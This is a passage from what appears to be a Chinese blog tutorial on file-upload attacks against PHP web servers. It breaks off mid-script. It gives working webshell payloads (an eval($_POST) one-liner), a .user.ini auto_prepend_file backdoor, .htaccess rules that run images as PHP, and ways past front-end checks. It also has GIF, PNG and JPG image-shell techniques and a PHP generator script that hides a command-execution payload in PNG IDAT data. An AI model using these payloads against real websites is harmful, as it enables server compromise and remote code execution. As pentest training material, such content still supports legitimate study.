<code>.user.ini<\/code> \u98ce\u683c\u7684 INI \u6587\u4ef6\u4e2d\u53ea\u6709\u5177\u6709 PHP_INI_PERDIR \u548c PHP_INI_USER \u6a21\u5f0f\u7684 INI \u8bbe\u7f6e\u53ef\u88ab\u8bc6\u522b\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u5f88\u6e05\u695a\u4e86\uff0c<code>.user.ini<\/code>\u5b9e\u9645\u4e0a\u5c31\u662f\u4e00\u4e2a\u53ef\u4ee5\u7531\u7528\u6237\u201c\u81ea\u5b9a\u4e49\u201d\u7684php.ini\uff0c\u6211\u4eec\u80fd\u591f\u81ea\u5b9a\u4e49\u7684\u8bbe\u7f6e\u662f\u6a21\u5f0f\u4e3a\u201cPHP_INI_PERDIR \u3001 
PHP_INI_USER\u201d\u7684\u8bbe\u7f6e\u3002\uff08\u4e0a\u9762\u8868\u683c\u4e2d\u6ca1\u6709\u63d0\u5230\u7684PHP_INI_PERDIR\u4e5f\u53ef\u4ee5\u5728.user.ini\u4e2d\u8bbe\u7f6e\uff09<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u9664\u4e86PHP_INI_SYSTEM\u4ee5\u5916\u7684\u6a21\u5f0f\uff08\u5305\u62ecPHP_INI_ALL\uff09\u90fd\u662f\u53ef\u4ee5\u901a\u8fc7.user.ini\u6765\u8bbe\u7f6e\u7684\u3002<\/p>\n\n\n\n<p>\u800c\u4e14\uff0c\u548cphp.ini\u4e0d\u540c\u7684\u662f\uff0c.user.ini\u662f\u4e00\u4e2a\u80fd\u88ab\u52a8\u6001\u52a0\u8f7d\u7684ini\u6587\u4ef6\u3002\u4e5f\u5c31\u662f\u8bf4\u6211\u4fee\u6539\u4e86.user.ini\u540e\uff0c\u4e0d\u9700\u8981\u91cd\u542f\u670d\u52a1\u5668\u4e2d\u95f4\u4ef6\uff0c\u53ea\u9700\u8981\u7b49\u5f85user_ini.cache_ttl\u6240\u8bbe\u7f6e\u7684\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a300\u79d2\uff09\uff0c\u5373\u53ef\u88ab\u91cd\u65b0\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p>\u7136\u540e\u6211\u4eec\u770b\u5230php.ini\u4e2d\u7684\u914d\u7f6e\u9879\uff0c\u53ef\u60dc\u6211\u6cae\u4e27\u5730\u53d1\u73b0\uff0c\u53ea\u8981\u7a0d\u5fae\u654f\u611f\u7684\u914d\u7f6e\u9879\uff0c\u90fd\u662fPHP_INI_SYSTEM\u6a21\u5f0f\u7684\uff08\u751a\u81f3\u662fphp.ini only\u7684\uff09\uff0c\u5305\u62ecdisable_functions\u3001extension_dir\u3001enable_dl\u7b49\u3002 \u4e0d\u8fc7\uff0c\u6211\u4eec\u53ef\u4ee5\u5f88\u5bb9\u6613\u5730\u501f\u52a9.user.ini\u6587\u4ef6\u6765\u6784\u9020\u4e00\u4e2a\u201c\u540e\u95e8\u201d\u3002 <code>auto_append_file<\/code>\u3001<code>auto_prepend_file<\/code><\/p>\n\n\n\n<p>\u6307\u5b9a\u4e00\u4e2a\u6587\u4ef6\uff0c\u81ea\u52a8\u5305\u542b\u5728\u8981\u6267\u884c\u7684\u6587\u4ef6\u524d\uff0c\u7c7b\u4f3c\u4e8e\u5728\u6587\u4ef6\u524d\u8c03\u7528\u4e86require()\u51fd\u6570\u3002\u800cauto_append_file\u7c7b\u4f3c\uff0c\u53ea\u662f\u5728\u6587\u4ef6\u540e\u9762\u5305\u542b\u3002 \u4f7f\u7528\u65b9\u6cd5\u5f88\u7b80\u5355\uff0c\u76f4\u63a5\u5199\u5728.user.ini\u4e2d\uff1a<\/p>\n\n\n\n<pre 
class=\"wp-block-preformatted\">auto_prepend_file=01.gif<\/pre>\n\n\n\n<p>01.gif\u662f\u8981\u5305\u542b\u7684\u6587\u4ef6\u3002<\/p>\n\n\n\n<p>\u52a0\u8f7d1.gif\u6587\u4ef6<\/p>\n\n\n\n<p>\u4e0a\u4f201.gif\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GIF89a<br>&lt;script language='php'&gt; @eval($_POST['a']);&lt;\/script&gt;<\/pre>\n\n\n\n<p>\u8bbf\u95ee\u540c\u76ee\u5f55\u4e2d\u7684php\u6587\u4ef6\uff0c\u4f8b\u5982index.php \uff0c\u5148\u901a\u8fc7\u672c\u76ee\u5f55\u4e2d\u7684\u914d\u7f6e\u6587\u4ef6.user.ini\u8fdb\u884c\u52a0\u8f7d1.gif\u6587\u4ef6\u4ece\u800c\u8fbe\u5230\u52a0\u8f7d\u540e\u95e8\u7684\u76ee\u7684<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u53ef\u4ee5\u501f\u52a9.user.ini\u8f7b\u677e\u8ba9\u6240\u6709php\u6587\u4ef6\u90fd\u201c\u81ea\u52a8\u201d\u5305\u542b\u67d0\u4e2a\u6587\u4ef6\uff0c\u800c\u8fd9\u4e2a\u6587\u4ef6\u53ef\u4ee5\u662f\u4e00\u4e2a\u6b63\u5e38php\u6587\u4ef6\uff0c\u4e5f\u53ef\u4ee5\u662f\u4e00\u4e2a\u5305\u542b\u4e00\u53e5\u8bdd\u7684webshell\u3002<\/p>\n\n\n\n<p><strong>.htaccess<\/strong><\/p>\n\n\n\n<p>.htaccess\u6587\u4ef6(\u6216\u8005\u201d\u5206\u5e03\u5f0f\u914d\u7f6e\u6587\u4ef6\u201d\uff09\u63d0\u4f9b\u4e86\u9488\u5bf9\u76ee\u5f55\u6539\u53d8\u914d\u7f6e\u7684\u65b9\u6cd5\uff0c \u5373\uff0c\u5728\u4e00\u4e2a\u7279\u5b9a\u7684\u6587\u6863\u76ee\u5f55\u4e2d\u653e\u7f6e\u4e00\u4e2a\u5305\u542b\u4e00\u4e2a\u6216\u591a\u4e2a\u6307\u4ee4\u7684\u6587\u4ef6\uff0c 
\u4ee5\u4f5c\u7528\u4e8e\u6b64\u76ee\u5f55\u53ca\u5176\u6240\u6709\u5b50\u76ee\u5f55\u3002\u4f5c\u4e3a\u7528\u6237\uff0c\u6240\u80fd\u4f7f\u7528\u7684\u547d\u4ee4\u53d7\u5230\u9650\u5236\u3002\u7ba1\u7406\u5458\u53ef\u4ee5\u901a\u8fc7Apache\u7684AllowOverride\u6307\u4ee4\u6765\u8bbe\u7f6e\u3002<\/p>\n\n\n\n<p>\u6982\u8ff0\u6765\u8bf4\uff0chtaccess\u6587\u4ef6\u662fApache\u670d\u52a1\u5668\u4e2d\u7684\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\uff0c\u5b83\u8d1f\u8d23\u76f8\u5173\u76ee\u5f55\u4e0b\u7684\u7f51\u9875\u914d\u7f6e\u3002\u901a\u8fc7htaccess\u6587\u4ef6\uff0c\u53ef\u4ee5\u5e2e\u6211\u4eec\u5b9e\u73b0\uff1a\u7f51\u9875301\u91cd\u5b9a\u5411\u3001\u81ea\u5b9a\u4e49404\u9519\u8bef\u9875\u9762\u3001\u6539\u53d8\u6587\u4ef6\u6269\u5c55\u540d\u3001\u5141\u8bb8\/\u963b\u6b62\u7279\u5b9a\u7684\u7528\u6237\u6216\u8005\u76ee\u5f55\u7684\u8bbf\u95ee\u3001\u7981\u6b62\u76ee\u5f55\u5217\u8868\u3001\u914d\u7f6e\u9ed8\u8ba4\u6587\u6863\u7b49\u529f\u80fd\u3002 \u542f\u7528.htaccess\uff0c\u9700\u8981\u4fee\u6539httpd.conf\uff0c\u542f\u7528AllowOverride\uff0c\u5e76\u53ef\u4ee5\u7528AllowOverride\u9650\u5236\u7279\u5b9a\u547d\u4ee4\u7684\u4f7f\u7528\u3002\u5982\u679c\u9700\u8981\u4f7f\u7528.htaccess\u4ee5\u5916\u7684\u5176\u4ed6\u6587\u4ef6\u540d\uff0c\u53ef\u4ee5\u7528AccessFileName\u6307\u4ee4\u6765\u6539\u53d8\u3002\u4f8b\u5982\uff0c\u9700\u8981\u4f7f\u7528.config \uff0c\u5219\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u914d\u7f6e\u6587\u4ef6\u4e2d\u6309\u4ee5\u4e0b\u65b9\u6cd5\u914d\u7f6e\uff1aAccessFileName .config \u3002 
\u7b3c\u7edf\u5730\u8bf4\uff0c.htaccess\u53ef\u4ee5\u5e2e\u6211\u4eec\u5b9e\u73b0\u5305\u62ec\uff1a\u6587\u4ef6\u5939\u5bc6\u7801\u4fdd\u62a4\u3001\u7528\u6237\u81ea\u52a8\u91cd\u5b9a\u5411\u3001\u81ea\u5b9a\u4e49\u9519\u8bef\u9875\u9762\u3001\u6539\u53d8\u4f60\u7684\u6587\u4ef6\u6269\u5c55\u540d\u3001\u5c01\u7981\u7279\u5b9aIP\u5730\u5740\u7684\u7528\u6237\u3001\u53ea\u5141\u8bb8\u7279\u5b9aIP\u5730\u5740\u7684\u7528\u6237\u3001\u7981\u6b62\u76ee\u5f55\u5217\u8868\uff0c\u4ee5\u53ca\u4f7f\u7528\u5176\u4ed6\u6587\u4ef6\u4f5c\u4e3aindex\u6587\u4ef6\u7b49\u4e00\u4e9b\u529f\u80fd\u3002 .htaccess\u6587\u4ef6\u53ef\u4ee5\u5728\u7f51\u7ad9\u76ee\u5f55\u6811\u7684\u4efb\u4f55\u4e00\u4e2a\u76ee\u5f55\u4e2d\uff0c\u53ea\u5bf9\u8be5\u6587\u4ef6\u6240\u5728\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\u6709\u6548\u3002<\/p>\n\n\n\n<p>\u6ce8\u610f\uff1a<\/p>\n\n\n\n<p>1\u3001\u5b50\u76ee\u5f55\u4e2d\u7684\u6307\u4ee4\u4f1a\u7b3c\u76d6\u66f4\u9ad8\u7ea7\u76ee\u5f55\u6216\u8005\u4e3b\u5668\u914d\u7f6e\u4e2d\u7684\u6307\u4ee4\u3002 \u5982\u679c .htaccess \u6587\u4ef6\u4fdd\u5b58\u5728 \/apache\/home\/www\/Gunjit\/ \u76ee\u5f55\uff0c\u90a3\u4e48\u5b83\u4f1a\u5411\u8be5\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\u63d0\u4f9b\u547d\u4ee4\uff0c\u4f46\u5982\u679c\u8be5\u76ee\u5f55\u5305\u542b\u4e00\u4e2a\u540d\u4e3a \/Gunjit\/images\/ \u5b50\u76ee\u5f55\uff0c\u4e14\u8be5\u5b50\u76ee\u5f55\u4e2d\u4e5f\u6709\u4e00\u4e2a .htaccess \u6587\u4ef6\uff0c\u90a3\u4e48\u8fd9\u4e2a\u5b50\u76ee\u5f55\u4e2d\u7684\u547d\u4ee4\u4f1a\u8986\u76d6\u7236\u76ee\u5f55\u4e2d .htaccess 
\u6587\u4ef6(\u6216\u8005\u76ee\u5f55\u5c42\u6b21\u7ed3\u6784\u4e2d\u66f4\u4e0a\u5c42\u7684\u6587\u4ef6)\u63d0\u4f9b\u7684\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>.htaccess\u6587\u4ef6\u4e2d\u7684\u914d\u7f6e\u6307\u4ee4\u4f5c\u7528\u4e8e.htaccess\u6587\u4ef6\u6240\u5728\u7684\u76ee\u5f55\u53ca\u5176\u6240\u6709\u5b50\u76ee\u5f55\uff0c\u4f46\u662f\u5f88\u91cd\u8981\u7684\u3001\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5176\u4e0a\u7ea7\u76ee\u5f55\u4e5f\u53ef\u80fd\u4f1a\u6709.htaccess\u6587\u4ef6\uff0c\u800c\u6307\u4ee4\u662f\u6309\u67e5\u627e\u987a\u5e8f\u4f9d\u6b21\u751f\u6548\u7684\uff0c\u6240\u4ee5\u4e00\u4e2a\u7279\u5b9a\u76ee\u5f55\u4e0b\u7684.htaccess\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\u53ef\u80fd\u4f1a\u8986\u76d6\u5176\u4e0a\u7ea7\u76ee\u5f55\u4e2d\u7684.htaccess\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\uff0c\u5373\u5b50\u76ee\u5f55\u4e2d\u7684\u6307\u4ee4\u4f1a\u8986\u76d6\u7236\u76ee\u5f55\u6216\u8005\u4e3b\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\u3002<\/p>\n\n\n\n<p>2\u3001.htaccess\u5fc5\u9700\u4ee5ASCII\u6a21\u5f0f\u4e0a\u4f20\uff0c\u6700\u597d\u5c06\u5176\u6743\u9650\u8bbe\u7f6e\u4e3a644\u3002 3\u3001\u4f7f\u7528.htaccess\u6587\u4ef6\uff0c\u4f1a\u964d\u4f4ehttpd\u670d\u52a1\u5668\u7684\u4e00\u70b9\u6027\u80fd<\/p>\n\n\n\n<p><strong>\u5982\u4f55\u542f\u7528.htaccess<\/strong> \u8981\u5728\u670d\u52a1\u5668\u4e0a\u4f7f\u7528.htaccess\u6587\u4ef6\u914d\u7f6e\uff0c\u5fc5\u987b\u8981\u6c42\u670d\u52a1\u5668\u5f00\u901a\u5bf9\u4e8e\u7684\u652f\u6301\u3002\u4e24\u4e2a\u6761\u4ef6\uff1a1.mod_rewrite\u6a21\u5757\u5f00\u542f\uff1b2. 
AllowOverride All, \u5982\u4f55\u914d\u7f6e\uff1a<\/p>\n\n\n\n<p>\u542f\u7528AllowOverride\u3002\u6253\u5f00httpd.conf, \u5c06\u5de5\u4f5c\u76ee\u5f55\u4e0b\u7684AllowOverride None \u6539\u4e3aAllowOverride All\u3002<\/p>\n\n\n\n<p>\u5f00\u542f.mod_rewrite\u6a21\u5757\u3002\u5c06#LoadModule rewrite_module modules\/mod_rewrite.so\u524d\u7684#\u53bb\u6389\u5373\u53ef\u3002<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u91cd\u542fapache<\/li>\n<\/ol>\n\n\n\n<p><strong>\u4f7f\u7528\u65b9\u6cd5<\/strong><\/p>\n\n\n\n<p>1\u4f7f\u7528\u65b9\u6cd5\uff0c\u4e0a\u4f20.htaccess\u6587\u4ef6\u5185\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;FilesMatch \"shell\"&gt;<br>SetHandler application\/x-httpd-php<br>&lt;\/FilesMatch&gt;<br>\u5339\u914d\u6587\u4ef6\u540d\u4e3a\u201cshell\u201d\u7684\u6587\u4ef6\uff0c\u8be5\u6587\u4ef6\u4f5c\u4e3a\u53ef\u6267\u884c\u7a0b\u5e8f\u89e3\u6790<\/pre>\n\n\n\n<p>\u6216\u8005<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">AddType application\/x-httpd-php .jpg<br>jpg\u6587\u4ef6\u4f5c\u4e3a\u53ef\u6267\u884c\u7a0b\u5e8f\u6267\u884c<\/pre>\n\n\n\n<p>2\u518d\u4e0a\u4f20shell.jpg<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GIF89a<br>&lt;script language='php'&gt; 
@eval($_POST['a']);&lt;\/script&gt;<\/pre>\n\n\n\n<p>3\u8bbf\u95eeshell.jpg\u6587\u4ef6<\/p>\n\n\n\n<p><strong>\u524d\u7aef\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p><strong>\u5220\u9664\u524d\u7aef\u6821\u9a8c\u6587\u4ef6<\/strong><\/p>\n\n\n\n<p>\u76f4\u63a5\u5220\u9664js\u4ee3\u7801<\/p>\n\n\n\n<p><strong>\u7981\u7528js\u4ee3\u7801<\/strong><\/p>\n\n\n\n<p>\u4f7f\u7528\u63d2\u4ef6<\/p>\n\n\n\n<p><strong>bp\u6293\u5305<\/strong><\/p>\n\n\n\n<p>\u4f7f\u7528bp\u6293\u5305\uff0c\u4fee\u6539\u4e3a\u6728\u9a6c\u540e\u7f00\u540d\u3002\u518dcontent-type\u5c06\u4e0a\u4f20\u7684\u6587\u4ef6\u540e\u7f00\u8fdb\u884c\u4fee\u6539<\/p>\n\n\n\n<p><br><strong>\u4e8c\u6b21\u6e32\u67d3<\/strong><\/p>\n\n\n\n<p>\u539f\u7406\uff1a<\/p>\n\n\n\n<p>\u5728\u6211\u4eec\u4e0a\u4f20\u6587\u4ef6\u540e\uff0c\u7f51\u7ad9\u4f1a\u5bf9\u56fe\u7247\u8fdb\u884c\u4e8c\u6b21\u5904\u7406\uff0c\u670d\u52a1\u5668\u4f1a\u628a\u91cc\u9762\u7684\u5185\u5bb9\u8fdb\u884c\u66ff\u6362\u66f4\u65b0\uff0c\u6839\u636e\u539f\u6709\u7684\u56fe\u7247\u8fdb\u884c\u5bf9\u6bd4\uff0c\u627e\u5230\u6ca1\u4fee\u6539\u7684\u90e8\u5206\uff0c\u7136\u540e\u5229\u7528\u8fd9\u4e00\u90e8\u5206\uff0c\u751f\u6210\u4e00\u4e2a\u65b0\u7684\u56fe\u7247\u5e76\u653e\u5230\u7f51\u7ad9\u7684\u5bf9\u5e94\u6807\u7b7e\u8fdb\u884c\u663e\u793a\u3002<\/p>\n\n\n\n<p><strong>GIF\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\uff1a\u5236\u4f5c\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e00\uff1a\u76f4\u63a5\u7528Notepad++\u7b49\u8bb0\u4e8b\u672c\u7c7b\u578b\u8f6f\u4ef6\u6253\u5f00\uff0c\u5728\u56fe\u7247\u540e\u5199\u5165\u6267\u884c\u8bed\u53e5<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e8c\uff1a\uff08b\u4ee3\u8868\u7684\u662f\u4e8c\u8fdb\u5236\uff09\u4f7f\u7528\u547d\u4ee4\u5c06\u4e24\u4e2a\u6587\u4ef6\u5185\u5bb9\u5408\u5e76\uff08\u53ef\u4ee5\u5c06zip\u7b49\u5176\u4ed6\u7c7b\u578b\u6587\u4ef6\u4f2a\u88c5\u6210\u56fe\u7247\u7b49\uff0ccopy\/b 1.gif\/b+1.rar\/b 2.gif\uff09<\/p>\n\n\n\n<p>\u5c06\u51c6\u5907\u76841.gif 
\u548c2.php\u6587\u4ef6\uff0c\u6700\u540e\u518d\u5408\u6210\u4e3a3.gif<\/p>\n\n\n\n<p>\u5728\u76ee\u5f55\u4e0b\u6309\u4f4fshift\uff0c\u518d\u53f3\u952e\u6253\u5f00Open in Windows Terminal\uff08\u6216\u8005\u4ece\u547d\u4ee4\u63d0\u793a\u7b26\u8fdb\u5165\u5230\u8fd9\u4e2a\u76ee\u5f55\u4e2d\uff09<\/p>\n\n\n\n<p>copy 1.gif\/b + 2.php\/a 3.gif<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b65\uff1a\u5c06\u6587\u4ef6\u4e0a\u4f20\uff0c\u7136\u540e\u518d\u5bf9\u6bd4\u539f\u6587\u4ef6\u3002\u4e0a\u4f20\u540e\uff0c\u4f7f\u7528010\u8fdb\u5236\u7f16\u8f91\u5668\u81ea\u5e26\u7684\u6bd4\u8f83\u6587\u4ef6\uff0c\u70b9\u51fbtools\uff0c\u70b9\u51fbcompare Files\uff0c\u9009match\u90e8\u5206\uff0c\u537316\u8fdb\u5236\u84dd\u8272\u5b57\u6bb5\u5c31\u662f\u6ca1\u88ab\u6539\u53d8\u7684<\/p>\n\n\n\n<p>\u7b2c\u4e09\u6b65\uff1a\u53ef\u4ee5\u5728\u6ca1\u6709\u6539\u53d8\u7684\u5730\u65b9\u63d2\u5165\u800c\u5df2\u4ee3\u7801<\/p>\n\n\n\n<p>\u7b2c\u56db\u6b65\uff1a\u83b7\u53d6\u6d4f\u89c8\u5668\u6253\u5f00\u6587\u4ef6\u5730\u5740\uff0c\u8f6f\u4ef6\u8fde\u63a5<\/p>\n\n\n\n<p><strong>PNG\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p>PNG\u6570\u636e\u7ec4\u6210\uff1a<\/p>\n\n\n\n<p>\u5173\u952e\u6570\u636e\u5757+\u8f85\u52a9\u6570\u636e\u5757<\/p>\n\n\n\n<p>\u6bcf\u4e2aPNG\u75313\u4e2a\u6807\u51c6\u6570\u636e\u5757\uff08IHDR,IDAT,IEND\uff09<\/p>\n\n\n\n<p>\u6807\u51c6\u6570\u636e\u5757\uff1a<\/p>\n\n\n\n<p>IHDR(header chunk):<\/p>\n\n\n\n<p>\u5305\u542b\u6709PNG\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u56fe\u50cf\u6570\u636e\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u5e76\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u6570\u636e\u5757\u51fa\u73b0\u5728PNG\u6570\u636e\u6d41\u4e2d\uff0c\u4e00\u4e2aPNG\u6570\u636e\u6d41\u4e2d\u53ea\u80fd\u6709\u4e00\u4e2a\u6587\u4ef6\u5934\u6570\u636e\u5757<\/p>\n\n\n\n<p>IDAT(image data chunk)\uff1a<\/p>\n\n\n\n<p>\u5b58\u50a8\u5b9e\u9645\u7684\u6570\u636e\uff0c\u5728\u6570\u636e\u6d41\u4e2d\u53ef\u5305\u542b\u591a\u4e2a\u8fde\u7eed\u987a\u5e8f\u7684\u56fe\u50cf\u6570\u636e\u5757\u3002 
IDAT\u5b58\u653e\u7740\u56fe\u50cf\u771f\u6b63\u7684\u6570\u636e\u4fe1\u606f\uff0c\u4e86\u89e3IDAT\u7684\u7ed3\u6784\uff0c\u5c31\u53ef\u4ee5\u751f\u6210PNG\u56fe\u50cf<\/p>\n\n\n\n<p>IEND(image trailer chunk)<\/p>\n\n\n\n<p>\u6807\u8bb0PNG\u6587\u4ef6\u6216\u8005\u6570\u636e\u6d41\u5df2\u7ecf\u7ed3\u675f\uff0c\u5e76\u4e14\u5fc5\u987b\u653e\u5728\u6587\u4ef6\u7684\u5c3e\u90e8\uff0c\u5373<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">00 00 00 00 49 45 4E 44 AE 42 60 82<\/pre>\n\n\n\n<p>\u8f85\u52a9\u6570\u636e\u5757\uff1a<\/p>\n\n\n\n<p>PLTE\uff1a<\/p>\n\n\n\n<p>\u662f\u8f85\u52a9\u6570\u636e\u5757,\u5bf9\u4e8e\u7d22\u5f15\u56fe\u50cf\uff0c\u8c03\u8272\u677f\u4fe1\u606f\u662f\u5fc5\u987b\u7684\uff0c\u8c03\u8272\u677f\u7684\u989c\u8272\u7d22\u5f15\u4ece0\u5f00\u59cb\u7f16\u53f7\uff0c\u7136\u540e\u662f1\u30012\u2026\u2026\uff0c\u8c03\u8272\u677f\u7684\u989c\u8272\u6570\u4e0d\u80fd\u8d85\u8fc7\u8272\u6df1\u4e2d\u89c4\u5b9a\u7684\u989c\u8272\u6570\uff08\u5982\u56fe\u50cf\u8272\u6df1\u4e3a4\u7684\u65f6\u5019\uff0c\u8c03\u8272\u677f\u4e2d\u7684\u989c\u8272\u6570\u4e0d\u53ef\u4ee5\u8d85\u8fc72^4=16\uff09\uff0c\u5426\u5219\uff0c\u8fd9\u5c06\u5bfc\u81f4PNG\u56fe\u50cf\u4e0d\u5408\u6cd5\u3002<\/p>\n\n\n\n<p>\u5229\u7528\u8fc7\u7a0b\uff1a\u4f7f\u7528PHP\u811a\u672c\u5199\u5165\u5728IDAT\u4e2d<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\uff1a\u521b\u5efaIDAT_png.php\u811a\u672c\uff08\u751f\u6210\u4e00\u4e2a\u7ed5\u8fc7\u6e32\u67d3\u7684\u56fe\u7247\u9a6c\uff09\uff1a<\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u5373\u53ef\u751f\u6210<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?$_GET[0]($_POST[1];?)&gt;<\/pre>\n\n\n\n<p>\u4f7f\u7528\u65b9\u5f0f\uff1aget\u4f20\u53c20= post\u4f20\u53c21=<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,<br> 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x66, 0x44, 0x50, 0x33);<br> <br> <br> <br>$img = imagecreatetruecolor(32, 32);<br> <br>for ($y = 0; $y &lt; sizeof($p); $y += 3) {<br> &nbsp; $r = $p[$y];<br> &nbsp; $g = $p[$y+1];<br> &nbsp; $b = $p[$y+2];<br> &nbsp; $color = imagecolorallocate($img, $r, $g, $b);<br> &nbsp; imagesetpixel($img, round($y \/ 3), 0, $color);<br>}<br> <br>imagepng($img,'.\/1.png');<br>?&gt;<\/pre>\n\n\n\n<p>\u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528php\u547d\u4ee4\u6267\u884cphp\u811a\u672c\u6587\u4ef6<\/p>\n\n\n\n<p>\u6267\u884c\u547d\u4ee4\uff08\u6ca1\u62a5\u9519\u5c31\u662f\u6210\u529f\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php IDAT_png.php 2.png<\/pre>\n\n\n\n<p>\u7136\u540e\u53ef\u4ee5\u770b\u5230\u751f\u6210\u4e86\u4e00\u4e2aphp\u811a\u672c\u91cc\u9762\u8fd0\u884c\u51fa\u6765\u76841.png\u6587\u4ef6<\/p>\n\n\n\n<p>\u4e0a\u4f20\u751f\u6210\u76841.png\u6587\u4ef6\uff0c\u5728\u6d4f\u89c8\u5668\u4e0a\u8bbf\u95ee<\/p>\n\n\n\n<p>\u80fd\u6b63\u5e38\u8bbf\u95ee<\/p>\n\n\n\n<p>\u7528\u7684php\u811a\u672c\u751f\u6210\u7684\u56fe\u7247\u6240\u5199\u5165\u7684\u662f&lt;?$_GET[0]($_POST[1]);?&gt;<\/p>\n\n\n\n<p>\uff08\u6839\u636e\u811a\u672c\u5199\u5165\u60c5\u51b5\u6765\u5b9a\uff0c\u4e0d\u786e\u5b9a\u53ef\u4ee5\u7528010 Editor\u7b49\u7f16\u8f91\u5668\u67e5\u770b\uff09<\/p>\n\n\n\n<p>\u7136\u540e\u7ed3\u5408\u6587\u4ef6\u4e0a\u4f20\uff0c\u8fdb\u884cGET\u548cPOST\u4f20\u53c2<\/p>\n\n\n\n<p>get\u4f20\u53c20=<\/p>\n\n\n\n<p>post\u4f20\u53c21=<\/p>\n\n\n\n<p>\uff08\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u628a\u4e0a\u4f20\u7684\u56fe\u7247\u518d\u4fdd\u5b58\u5230\u672c\u5730\uff0c\u7528010 Editor\u67e5\u770b\uff09 
\u7136\u540e\u8681\u5251\u8fde\u63a5<\/p>\n\n\n\n<p>JPG\u7ed5\u8fc7<\/p>\n\n\n\n<p>JPG\u662fJPEG\u7684\u7b80\u5199\uff0cjpg\u662f\u540e\u7f00\u540d\uff0cjpeg\u65e2\u53ef\u4ee5\u4f5c\u4e3a\u540e\u7f00\u540d\u53c8\u80fd\u4ee3\u8868\u6587\u4ef6\u683c\u5f0f\u548cpng\u7684\u64cd\u4f5c\u6b65\u9aa4\u57fa\u672c\u4e00\u81f4\uff0c\u5c31\u662f\u811a\u672c\u4e0d\u4e00\u6837\u3002<\/p>\n\n\n\n<p>\u5728\u548cJPG\u540c\u4e00\u6587\u4ef6\u4e0b\u521b\u5efajpg_payload.php\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br> <br> &nbsp;  $miniPayload = \"&lt;?=phpinfo();?&gt;\";<br> <br> <br> &nbsp;  if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {<br> &nbsp; &nbsp; &nbsp;  die('php-gd is not installed');<br> &nbsp;  }<br> <br> &nbsp;  if(!isset($argv[1])) {<br> &nbsp; &nbsp; &nbsp;  die('php jpg_payload.php &lt;jpg_name.jpg&gt;');<br> &nbsp;  }<br> <br> &nbsp;  set_error_handler(\"custom_error_handler\");<br> <br> &nbsp;  for($pad = 0; $pad &lt; 1024; $pad++) {<br> &nbsp; &nbsp; &nbsp;  $nullbytePayloadSize = $pad;<br> &nbsp; &nbsp; &nbsp;  $dis = new DataInputStream($argv[1]);<br> &nbsp; &nbsp; &nbsp;  $outStream = file_get_contents($argv[1]);<br> &nbsp; &nbsp; &nbsp;  $extraBytes = 0;<br> &nbsp; &nbsp; &nbsp;  $correctImage = TRUE;<br> <br> &nbsp; &nbsp; &nbsp;  if($dis-&gt;readShort() != 0xFFD8) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('Incorrect SOI marker');<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  while((!$dis-&gt;eof()) &amp;&amp; ($dis-&gt;readByte() == 0xFF)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $marker = $dis-&gt;readByte();<br> &nbsp; 